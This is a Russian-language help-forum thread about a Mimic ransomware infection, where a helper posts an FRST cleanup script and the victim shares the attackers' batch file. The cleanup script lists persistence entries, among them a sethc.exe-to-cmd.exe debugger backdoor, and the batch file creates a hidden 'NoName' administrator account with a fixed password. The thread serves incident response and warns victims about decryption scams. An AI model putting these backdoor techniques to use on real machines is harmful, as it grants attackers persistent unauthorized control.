Перейти к содержанию

Рекомендуемые сообщения

По очистке системы:

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт автоматически очистит систему, и завершит работу без перезагрузки

 

Start::
HKLM\...\Run: [svhostss.exe] => notepad.exe "C:\Users\NoName\AppData\Local\Decryption_INFO.txt" (Нет файла)
HKLM\...\Policies\system: [legalnoticetext] Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences
IFEO\CompatTelRunner.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\logoff.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\perfmon.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchApp.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchIndexer.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\SearchProtocolHost.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\sethc.exe: [Debugger] c:\windows\system32\cmd.exe
IFEO\shutdown.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskkill.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\tasklist.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\taskmgr.exe: [Debugger] C:\Windows\System32\Systray.exe
IFEO\wsqmcons.exe: [Debugger] C:\Windows\System32\Systray.exe
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk [2020-04-20]
ShortcutTarget: AnyDesk.lnk -> C:\Program Files (x86)\AnyDesk\AnyDesk.exe (Нет файла)
GroupPolicy: Ограничение - Chrome <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Task: {1D088239-875A-405A-B745-78C1D3E6B266} - \Apple\AppleSoftwareUpdate -> Нет файла <==== ВНИМАНИЕ
Task: {3AE5B73F-DFBB-4D64-84CF-BD12BEA09CA7} - \rep -> Нет файла <==== ВНИМАНИЕ
Task: {4ED79AAE-FD1E-4960-A86D-B9F79EB307EA} - \sm1 -> Нет файла <==== ВНИМАНИЕ
Task: {7AC40101-6609-494F-9451-A58D214D8D13} - \curl -> Нет файла <==== ВНИМАНИЕ
Task: {7C9C5F33-157D-4E5D-9881-16BED684B3E4} - \curls -> Нет файла <==== ВНИМАНИЕ
Task: {B15A2FE3-5E8F-48AD-AEBF-60881B47D989} - \MSI -> Нет файла <==== ВНИМАНИЕ
2024-06-09 17:50 - 2024-06-10 00:17 - 000000935 _____ C:\Decryption_INFO.txt
2024-06-09 17:18 - 2024-06-09 20:26 - 000000000 ____D C:\Program Files\Process Hacker 2
2024-06-09 17:18 - 2024-06-09 17:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Process Hacker 2
2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat
End::

 

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение.

Папку C:\FRST\Quarantine добавьте в архив с паролем virus, архив загрузите на облачный диск и дайте ссылку на скачивание архива в ЛС.

 

 

К сожалению, расшифровка файлов по данному типу шифровальщика невозможна без приватного ключа.

 

По Mimic Ransomware, который активен в течение более 1,5 лет, к сожалению, нет в настоящее время расшифровки файлов без приватного ключа. Злоумышленники, стоящие за Mimic используют утекший в сеть билдер Conti чтобы извлечь выгоду из его различных функций и даже улучшить код для более эффективных атак.

-----------

Будьте внимательны,

в ЛС, (после создания темы), к вам могут обратиться с предложением о помощи в расшифровке.

Если предлагают готовое решение с вашим приватным ключом - тогда это злоумышленники (ключ хранится у них),

если предлагают решение: расшифровать бесплатно несколько ваших файлов, как доказательство своих возможностей - и они это смогут сделать, запросив бесплатную расшифровку у злоумышленников, а остальные файлы - за выкуп вашего дешифратора/ключа за ваши деньги, то это могут быть посредники,

здесь основной риск - после получения оплаты посредники просто исчезают из чата или контакта,

если после получения вашей оплаты за дешифратор с ключом посредники исчезают из контакта, то это, увы, были мошенники.

+

проверьте ЛС.

Ссылка на комментарий
Поделиться на другие сайты

Исследую файлы с одного из зараженных компов. По всей видимости был использован целый комплекс ПО на питоне. 

 

1.thumb.png.9bf8cca947d09e244f6f01d30a3f4f1b.png

Ссылка на комментарий
Поделиться на другие сайты

NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

Ссылка на комментарий
Поделиться на другие сайты

  • 2 часа назад, safety сказал:

    NoName - сторонняя или служебная учетная запись? пакеты с Python к Mimic, скорее всего не имеют отношения. Кто-то развернул Python, добавил криптобиблиотеки, возможно другие инструменты. С какой целью? возможно для изучения. Надо смотреть по датам развертывания. Злоумышленники с шифрованием приходят уже с готовым установщиком для Mimic.

    Сторонняя. Была создана злоумышленниками.

Ссылка на комментарий
Поделиться на другие сайты

40 минут назад, safety сказал:

А что в этом файле?

2024-06-09 15:46 - 2024-06-09 15:46 - 000000428 _____ C:\Windows\system32\u2.bat

С помощью этого батника был создан пользователь NoName

 

@echo off
echo ---------
color 0f
set  user=NoName
set  pass=ntpe9gNjIH
set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /Passwordchg:Yes
net localgroup %AdmGroup% %user% /add
WMIC useraccount where name='%user%' set passwordexpires=false
 

Сравнил файлы "записок" с контактами, на каждой машине присвоен у них разный ID, т.е. еще и ключи для расшифровки на каждой будут разные.

Изменено пользователем Ezh85
Ссылка на комментарий
Поделиться на другие сайты

К сожалению, мы не сможем вам помочь с дешифровкой файлов после Mimic.

Изменено пользователем safety
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • DeepX
      От DeepX
      Прилетел шифровальщик elpaco-team. Зашифровал несколько серверов. Удалил теневые копии. Бэкапы Acronis зашифровал. Сервера в основном Windows Server 2008.
      Логи и примеры зашифрованных файлов прикладываю. Требований не обнаружили пока. Спасибо за помощь!
      Addition.txt FRST.txt files.zip
    • Максим Шахторин
      От Максим Шахторин
      Здравствуйте, ELPACO-team залетел в наш сервер, зашифровал 1с, если кто научился дешифровать, дайте знать. Хакеры указали не вменяемую сумму за ключ.
    • Forrestem
      От Forrestem
      В МО одна особа скачала письмо из папки спам, в следствии чего поймала вирус шифровальщик, вопрос, есть ли возможность как то восстановить данные?
      Addition.txt FRST.txt
    • ООО Арт-Гарант
      От ООО Арт-Гарант
      Здравствуйте на группу компаний ООО "Арт-Гарант" была совершена атака вируса ELPACO-team
      Атаке подвергся сервер компании на ОС Windows Server 2008 или Windows Server 2008 R2
      1-я атака состоялась 26.11.2024 18:45-20:33
      2-я атака состоялась 26.11.2024 22:00-23:45
      Обнаружены с начала рабочего дня в 9:00
      3-я атака состоялась 27.11.2024 в около 10:20 до 10:32
      в это же время мы отключили сервер от питания
      в данный момент прилагаю вложениями только зашифрованные файлы, так как нет возможности на момент обращения собрать логи с помощью "Farbar Recovery Scan Tool" (позднее новым сообщением добавлю, как появится уполномоченное лицо с доступом в систему на сервер)

      К вышеуказанному у нас предположение, что атакован в том числе бухгалтерский сервер с базой 1С, т.к. у лица с высшими полномочиями в базе наблюдались большие проблемы с быстродействием. Данный сервер мы отключили от питания в том числе.

      Так  же вопрос, в правилах оформления п4. "Сохраните в отдельном архиве с паролем (virus) файл шифровальщика, если его удалось найти" сказано если удалось найти, как это сделать?

      Архив с паролем (virus).zip
    • Шустов А.В.
      От Шустов А.В.
      Добрый день. Поймали ELPACO-team. Всего 6-ть компов. Просьба в помощи.
      Во вложении зашифрованные файлы, файл от злоумышленников и логи FRST.
      Файлы ELPACO-team.ZIP Addition.txt FRST.txt
×
×
  • Создать...